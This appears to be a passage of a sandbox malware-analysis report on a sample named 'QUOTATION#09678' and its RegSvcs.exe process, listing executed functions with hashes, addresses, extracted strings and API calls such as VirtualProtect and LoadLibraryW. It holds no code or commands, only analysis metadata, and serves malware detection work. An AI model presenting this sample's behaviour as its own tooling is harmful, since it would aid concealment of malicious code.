Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: 0#%
API String ID: 0-3812812541
Opcode ID: 9f1a09ca814efb167946a387e0b02f7414e82fa9fe003dbf7c7b82238e8d6a30
Instruction ID: e388aace80ec5ed5abbe88c28bd7728510f7a4f71588f5777bcc6da52a531908
Opcode Fuzzy Hash: 9f1a09ca814efb167946a387e0b02f7414e82fa9fe003dbf7c7b82238e8d6a30
Instruction Fuzzy Hash: E872463151DB4A8FE36ADB2884455B577E1FF96310B0485BEE48EC7292DE24EC4AC7C1

Function 00007FFAAC7B1700 Relevance: 2.0, Strings: 1, Instructions: 701
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFAAC7B5F9F

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 4bae154c826f3f06f7967ad7fc42c991a025804a8501e59e7e8787de1acb1599
Instruction ID: f405a51bac2dd5805d485238c999678951d414a50628b71a195938969331e6e5
Opcode Fuzzy Hash: 4bae154c826f3f06f7967ad7fc42c991a025804a8501e59e7e8787de1acb1599
Instruction Fuzzy Hash: BA223171A1DA4A8FE758EB28C4859B177E0EF46310B1482BAD44FC7597DE38E84787C0

Function 00007FFAAC7BA090 Relevance: 1.9, Strings: 1, Instructions: 667
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p]%, xrefs: 00007FFAAC7C4C97

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: p]%
API String ID: 0-641334170
Opcode ID: 664e4833e22d383f637d0337fe15ca634ab348251fbef07949217b81d0ae2213
Instruction ID: 344391395a1d2f5554614a36bfb8cd9a11cd3f4d3437ec9b0fca61c0f3c21bc2
Opcode Fuzzy Hash: 664e4833e22d383f637d0337fe15ca634ab348251fbef07949217b81d0ae2213
Instruction Fuzzy Hash: 43122931A1DA9B8FF3AAD71C881667477E1EF9A310B1582BDD44DC7692DE18EC0A43C1

Function 00007FFAAC7B5440 Relevance: 1.7, Strings: 1, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFAAC7B5490

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: ca32125bc58dbff9b241f5e92cd4b82794868eb063621cd1b27860a8213d03e7
Instruction ID: 2ecf8973a429047f85f1c0f7cb5fe7a0b95804e8737add82c480e11b0a724f6c
Opcode Fuzzy Hash: ca32125bc58dbff9b241f5e92cd4b82794868eb063621cd1b27860a8213d03e7
Instruction Fuzzy Hash: 93C10531A1DA4A8FEB9CAB38D4555B577E1EF96310B04817EE48FC3593DE24EC068781

Function 00007FFAAC7BC910 Relevance: 1.7, Strings: 1, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sM_H, xrefs: 00007FFAAC7BCA8D

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID: sM_H
API String ID: 0-1705526980
Opcode ID: e7078ea40b60a704f7f1aa3b507596efee510dda4dcd34cce65cd071a614d887
Instruction ID: 53eb31a42a0a029a0d4094e8cb836d00f8c7be5791d02a3453b4a785c29924ac
Opcode Fuzzy Hash: e7078ea40b60a704f7f1aa3b507596efee510dda4dcd34cce65cd071a614d887
Instruction Fuzzy Hash: 62D1373191DB858FF319CB2884951B577E2FF96301B0486BED4CBC7296DA28E44A87C1

Function 00007FFAAC7BCCF1 Relevance: 1.4, Instructions: 1431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffb6e5622354b6bce92a12bb5ab986c9a74013349d90f98dea499d20f7455fa
Instruction ID: 9f23cbb27f5bcd8bc48bb7e2dfe0b3d82215b783e8995d9dba6de1b48a59dc68
Opcode Fuzzy Hash: fffb6e5622354b6bce92a12bb5ab986c9a74013349d90f98dea499d20f7455fa
Instruction Fuzzy Hash: 57A2273151DB4A8FE719DB28C4944A5B7F1FF96300B1485BEE48ECB2A7DA35E846C780

Function 00007FFAAC7B2AB5 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3d97a36971980177bfcf1435cc410eecb9701577fa4aad0ff341d223c044d8
Instruction ID: 42afa893c4d268857f84ede1ebffba308b9784bc541cca5ab71ab888d4dc76d0
Opcode Fuzzy Hash: 9d3d97a36971980177bfcf1435cc410eecb9701577fa4aad0ff341d223c044d8
Instruction Fuzzy Hash: 73B10671D0961D8FDB98DFA8D494BADBBB1FF59301F1041AAD00EE7292CB74A985CB40

Function 00007FFAAC7C601E Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38dbe3c34afed2c872698965b05f8ccdf71180996644a6cc345a79f5041bffc7
Instruction ID: 60261c1bada0775eaea543a95767af0ea2a4adf69f4e73adc9382d25bc3570b4
Opcode Fuzzy Hash: 38dbe3c34afed2c872698965b05f8ccdf71180996644a6cc345a79f5041bffc7
Instruction Fuzzy Hash: 14417B7260D7894FD71E9B3888165B67BA5EB83320F0582BFD487C71A7DD14984783D1

Function 00007FFAAC7C606B Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ad54ae457e044a027de21378b4189ac9fa37ecfaba3b832395513b2b1a4a77
Instruction ID: 4ce88adf78a9ced3c3a5c1615732bc3cfd375cacd940a462a89cb096ca602fec
Opcode Fuzzy Hash: c7ad54ae457e044a027de21378b4189ac9fa37ecfaba3b832395513b2b1a4a77
Instruction Fuzzy Hash: B141653160D68A5FD71E9B7488155B23BB5EB83310F06C2BBD48AC71A3DD28D80B83D2

Function 00007FFAAC7C60F3 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1263b2af7aef24dd8af5352c51bbeaa52496198604ff73250cdab09aeaff8f99
Instruction ID: 7a9733c44bc4187fdde53e19e76c570a579ae37a5da397b05772a577be231e1a
Opcode Fuzzy Hash: 1263b2af7aef24dd8af5352c51bbeaa52496198604ff73250cdab09aeaff8f99
Instruction Fuzzy Hash: 3831E33150E2C55FD32E8A7488265737FB9EB83211B0A82FBD4C6C61A3DD64985B83D2

Function 00007FFAAC7B3F36 Relevance: 1.7, APIs: 1, Instructions: 194
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC7B4078

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 074b87e90bee9a0b26109c7dd38d77e2b5a8bf8cd75cc129945d62329527d82f
Instruction ID: ba5d7c3bd14e00c693d0d7df5f00681e32a54b57ce07c2bf6e755303a38b3e71
Opcode Fuzzy Hash: 074b87e90bee9a0b26109c7dd38d77e2b5a8bf8cd75cc129945d62329527d82f
Instruction Fuzzy Hash: CD516D70D0864D8FDB54DFA8C845BEDBBF1FB56310F1042AAD049E7252DB74A885CB80

Function 00007FFAAC8910C9 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696482352.00007FFAAC890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac890000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64facbc48f2e5ff479dee577154a6e1e99b0ae181fae978fdaf71acffe8f9b74
Instruction ID: 0a7f0895258f7cf2a6b1989209937c15050c3fd501472fb63605e3f47cc84bbb
Opcode Fuzzy Hash: 64facbc48f2e5ff479dee577154a6e1e99b0ae181fae978fdaf71acffe8f9b74
Instruction Fuzzy Hash: 2171E47190DA898FEB56DB3888595A57BF0FF5A300B0940FAD04ECB593DA2DE845C781

Non-executed Functions

Function 00007FFAAC7B3C81 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695861018.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_QUOTATION#09678.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085ab4a0597369100144912ccbd89c17eb5c4d946c73d227b506c0ad5a5815d7
Instruction ID: ae777006cf2818c293b80ea7351e52f6f0bd0ce69a830f85bb7275940ccf4783
Opcode Fuzzy Hash: 085ab4a0597369100144912ccbd89c17eb5c4d946c73d227b506c0ad5a5815d7
Instruction Fuzzy Hash: D4818A70509A8D8FEBA4DF18C8457E97BE1FF59310F10816AE84EC7252DF749985CB81

Analysis Process: RegSvcs.exePID: 7564, Parent PID: 6704COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	1

Executed Functions

Function 050D2758 Relevance: 4.1, Strings: 3, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K$n^, xrefs: 050D28F7
+$n^, xrefs: 050D2A25, 050D2A2A
;$n^, xrefs: 050D295B

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: +$n^$;$n^$K$n^
API String ID: 0-4288904553
Opcode ID: 681efb553b69cc554160ecdc7e687f821c44269840c3c2824d7ff5816ae54334
Instruction ID: 8650dad462d4507ddd148b5e1c2276754f81c44666a0fe76427109333ae4a6c1
Opcode Fuzzy Hash: 681efb553b69cc554160ecdc7e687f821c44269840c3c2824d7ff5816ae54334
Instruction Fuzzy Hash: BBD12A38A003069FCB14DF69E594A6EBBF2FF89310B148469E805DB365DB34ED42CB60

Function 050D72B8 Relevance: 2.5, Strings: 1, Instructions: 1228COMMON

Download Yara Rule

Strings

,7q, xrefs: 050D78F7

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ,7q
API String ID: 0-3839523172
Opcode ID: cee505d8816ad63457391494a5cce79a80a429c02e21731a13e79cb134ab4ef1
Instruction ID: fef7fc79eee4679a9863de422d9d7e90da1aa60cfbb33681b1622237967e9b5e
Opcode Fuzzy Hash: cee505d8816ad63457391494a5cce79a80a429c02e21731a13e79cb134ab4ef1
Instruction Fuzzy Hash: B4929E74B403059FDB299B79986473EBBF3EFC8200B248469E906DB395DE34DC429B91

Function 050D0B48 Relevance: .9, Instructions: 860COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4753bc77972376bdd69b72a77f3c8588a6b0a9bca42ce46a325859f240d6176d
Instruction ID: 284442f0a4031109a8c1653f92b43b53709034ec8a17329bb32d211856cb8121
Opcode Fuzzy Hash: 4753bc77972376bdd69b72a77f3c8588a6b0a9bca42ce46a325859f240d6176d
Instruction Fuzzy Hash: 74726B34A003159FDB14DF65D894AAEBBF2FF88311F148568E9069B3A5DB35EC42CB90

Function 050D2B98 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d957a9dc3cb2b5828cb7e12d3491d6ffddba6b6774cb842c1fcb72743dae20
Instruction ID: f3fa8def9caaaf687fd9670f0fd3e9553191dc6c9100dd819a47a5eda3ecb563
Opcode Fuzzy Hash: 08d957a9dc3cb2b5828cb7e12d3491d6ffddba6b6774cb842c1fcb72743dae20
Instruction Fuzzy Hash: 5AC19D35B002059FDB08DF65D854AAEBBF6EFC8350B1484A9E905DB3A5DB34DC42DB60

Function 050D9E18 Relevance: 6.7, Strings: 5, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_q, xrefs: 050DA1FF
Hq, xrefs: 050D9FDB
Hq, xrefs: 050D9F59
(_q, xrefs: 050DA175
Hq, xrefs: 050DA06D

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (_q$(_q$Hq$Hq$Hq
API String ID: 0-722579334
Opcode ID: b6b3936060ef88f877032d186cd8ebe984958680a59bb2393a264712b56ab720
Instruction ID: 2a58cae8edbca357ddd33fb5a16b7fa0202807d70c95966d71ab33c5382da046
Opcode Fuzzy Hash: b6b3936060ef88f877032d186cd8ebe984958680a59bb2393a264712b56ab720
Instruction Fuzzy Hash: 32F1D134B043159FDB059B79E8256AEBBF2EF88310F148469E806DB381DB35DD42DBA1

Function 050DDD88 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

(q, xrefs: 050DDE06
(q, xrefs: 050DDE55

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: 600cd86a24126488778753388c7fb6bf0fb582dd090878ce9da59bf4e82ec17b
Instruction ID: fda56705947824977620c1d0a9fbbdf03f67ac8498d9999557ac19ae961a7024
Opcode Fuzzy Hash: 600cd86a24126488778753388c7fb6bf0fb582dd090878ce9da59bf4e82ec17b
Instruction Fuzzy Hash: 2941DE31B083445FEB09AB79A865B2E7BF2AFC5310F2448A9D846CB392DE35CC42D750

Function 060C7688 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,060C7546), ref: 060C76F6

Memory Dump Source

Source File: 0000000B.00000002.1542953644.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60c0000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 61135afa05dbe966dba139c8c98dc13605357bb49d2814a65062bcc3b3bcf44e
Instruction ID: 9b75296af64e90df068e81c3d412052dbb6de380a1903d3d2b1764469f585dcb
Opcode Fuzzy Hash: 61135afa05dbe966dba139c8c98dc13605357bb49d2814a65062bcc3b3bcf44e
Instruction Fuzzy Hash: 1F1114B9C007498FDB20DF9AD844ADEFBF5EB48220F14841AD429A7210D775A546CFA1

Function 060C7038 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,060C7546), ref: 060C76F6

Memory Dump Source

Source File: 0000000B.00000002.1542953644.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60c0000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 862dead326702f08c1b4001cc1df825933290cbd2693498a072e075de6276f59
Instruction ID: f31fa0e0a94f8472bfd32b61911d743b52e9ab086474d66084cddae3bf61a6d8
Opcode Fuzzy Hash: 862dead326702f08c1b4001cc1df825933290cbd2693498a072e075de6276f59
Instruction Fuzzy Hash: 521112B5D007498FDB20DF9AC844B9EFBF5EB88320F10842AD819A7200C379A545CFA5

Function 00F70CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00F70D47

Memory Dump Source

Source File: 0000000B.00000002.1536673052.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f70000_RegSvcs.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 1e5b5180b679b8d4fe425fbfda6e279124493a42ba45fce96858a4127e0281a0
Instruction ID: 0cab0d17520fcae14869a6f7a81d45f28e22ef6cae9c99b8d1d000b4af87783c
Opcode Fuzzy Hash: 1e5b5180b679b8d4fe425fbfda6e279124493a42ba45fce96858a4127e0281a0
Instruction Fuzzy Hash: 48113274D003498FDB20DFAAC449BDEFBF1AF48324F24841AD419A7240CB79A945CFA1

Function 00F71870 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00F718BE

Memory Dump Source

Source File: 0000000B.00000002.1536673052.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f70000_RegSvcs.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2bcf5b545cb1dcaa031203baff25ea3b7c66d8d54004fcb65656f493f0952f0f
Instruction ID: 68f4dc6daa51249fe79dde9b808120b2197dd4ba92fe4daa162535114eb6d8b9
Opcode Fuzzy Hash: 2bcf5b545cb1dcaa031203baff25ea3b7c66d8d54004fcb65656f493f0952f0f
Instruction Fuzzy Hash: EC010031F002248FCB48EBBDD8146AE7BF5BF8875071145A5D909EB364EA34DD018B91

Function 00F70CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00F70D47

Memory Dump Source

Source File: 0000000B.00000002.1536673052.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f70000_RegSvcs.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: c6c5d92261cdd9c4e966fa73791b0da9cdf76f989363b5c35576912a7a292440
Instruction ID: d768e06ca6ca4bbdf1e1c55e3cf62cb9284b41739aaac6d19b2171aff50da6a6
Opcode Fuzzy Hash: c6c5d92261cdd9c4e966fa73791b0da9cdf76f989363b5c35576912a7a292440
Instruction Fuzzy Hash: 66113375D003098FDB20DFAAC445B9EFBF5EF48320F20841AD419A7240CB79A945CFA5

Function 050D8B30 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

{$n^, xrefs: 050D8E05, 050D8E0A

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: {$n^
API String ID: 0-4256807472
Opcode ID: bc750746abfd52d9454e5a3422014b33815d0f590285c5f4fff90d46b57f23a4
Instruction ID: a12b67373afbb94067fcc8d4b07b8b8380507c0e332e8ef2b0560ec819e57279
Opcode Fuzzy Hash: bc750746abfd52d9454e5a3422014b33815d0f590285c5f4fff90d46b57f23a4
Instruction Fuzzy Hash: 9D81C330F003089FDB14EBA9D8557AEBBF2EF88300F5484A8D509DB395DA349D41D791

Function 050D2748 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

+$n^, xrefs: 050D2A25, 050D2A2A

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: +$n^
API String ID: 0-3766741989
Opcode ID: 2130b2346d58b765e5d8f9295632145af082a7ea19c766ee04d1a88301c794ea
Instruction ID: 1a164828d2b20a65917f986ac486ac26e1d8e181eba2f649ddd075f412f2e9e6
Opcode Fuzzy Hash: 2130b2346d58b765e5d8f9295632145af082a7ea19c766ee04d1a88301c794ea
Instruction Fuzzy Hash: EE714B34A01205DFCB14DF69E594A6EBBF2FF89311B2084A9E805DB351DB35ED82CB60

Function 050DD5C0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

(q, xrefs: 050DDC41

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 70a53770df0ececfbffee0ed08e2cc1c1408f341b2d1be84a5b50c593738d577
Instruction ID: 20ff5cde4d0eff2467d70cb1193ea3030517149996f83468de83b5b8e581937d
Opcode Fuzzy Hash: 70a53770df0ececfbffee0ed08e2cc1c1408f341b2d1be84a5b50c593738d577
Instruction Fuzzy Hash: DE813975A04309CFDB54DFA8E898AADBBF2BF48310F14446AD406EB391DB709845DB50

Function 06111550 Relevance: 1.4, Instructions: 1418COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376cc30dae31a50cd87a40efbe26a914ee1ae9ec4c8bf7aa3235182c0f7a7535
Instruction ID: 2d6efca18ce574306bddd486c1b8cc084699d188326425d8800b44e5478964eb
Opcode Fuzzy Hash: 376cc30dae31a50cd87a40efbe26a914ee1ae9ec4c8bf7aa3235182c0f7a7535
Instruction Fuzzy Hash: B8C23D30F406189FDB55DB54C851BADBBB2FF88700F1080A9E6199B3A1DB71EE819F91

Function 050D8EE0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

`Qq, xrefs: 050D8EEF

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `Qq
API String ID: 0-2318545310
Opcode ID: c5feeca2ac0aaf80271704f52a72438c3c221a85f8fdae860aff4f4accbafe58
Instruction ID: bd9ed274942497b5ef0476e79df73c5a3172ae04324e7aed391fa32b2cd4186d
Opcode Fuzzy Hash: c5feeca2ac0aaf80271704f52a72438c3c221a85f8fdae860aff4f4accbafe58
Instruction Fuzzy Hash: 9921D531B00314DBCF64EBA4B806BEEF7E6EF44760F1081A6D809DB285EB348A508791

Function 050D8EB1 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

`Qq, xrefs: 050D8EEF

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `Qq
API String ID: 0-2318545310
Opcode ID: 7f75bdc5366737e48c022ae4e701f344429ac4ba57ed3cd17214bc6af88de95f
Instruction ID: 45eb1df2a54353321b5f131ed1b4f05566abebb030ee5717790da3d9e89657ce
Opcode Fuzzy Hash: 7f75bdc5366737e48c022ae4e701f344429ac4ba57ed3cd17214bc6af88de95f
Instruction Fuzzy Hash: DC11C670A043109FDB11EB74A812B5EBFF6EF05720F11819AE841CB296DB789945D762

Function 0611349D Relevance: 1.3, Instructions: 1278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d38bf2604d20e60022890791ad494667f2d402ff4f6aaa83612dac9ab8da206
Instruction ID: a93c65f6b7d49ebdd44d9f26fcd79035344400334335f2e1dc866993130e45da
Opcode Fuzzy Hash: 1d38bf2604d20e60022890791ad494667f2d402ff4f6aaa83612dac9ab8da206
Instruction Fuzzy Hash: 31A1E174B042449FDB55DB78C854A6EBBF2EF89300B1584AAE516DF3A6CB31DC02CB61

Function 06110048 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba51a9f63f1ecaca7f88d35ef66fb5d1909442ebd56daae9b1a47f8181c4ae1
Instruction ID: 8902eba2f14a33def37f4b5cc77e61f6274f9bb5537396ce96aefb11ea8761df
Opcode Fuzzy Hash: 4ba51a9f63f1ecaca7f88d35ef66fb5d1909442ebd56daae9b1a47f8181c4ae1
Instruction Fuzzy Hash: E9427C30B007248FEB24AF64E45066EBBB2FFC5315B504A5CD5039F395CB7AE9468B86

Function 061104F3 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427a9f0b600f5261c4ec7e2e27a0ecac974ddfc7e18994c27539aca80d2cc845
Instruction ID: e33900820a88fcd6deca47b1ba308fd83ccb6e2716d8794403c9fd180dc905a5
Opcode Fuzzy Hash: 427a9f0b600f5261c4ec7e2e27a0ecac974ddfc7e18994c27539aca80d2cc845
Instruction Fuzzy Hash: 8A128B30B00714CFEB249F64D450A6EBBB2FF89305F504A5CD5029F3A5CB76E9468B96

Function 06110569 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

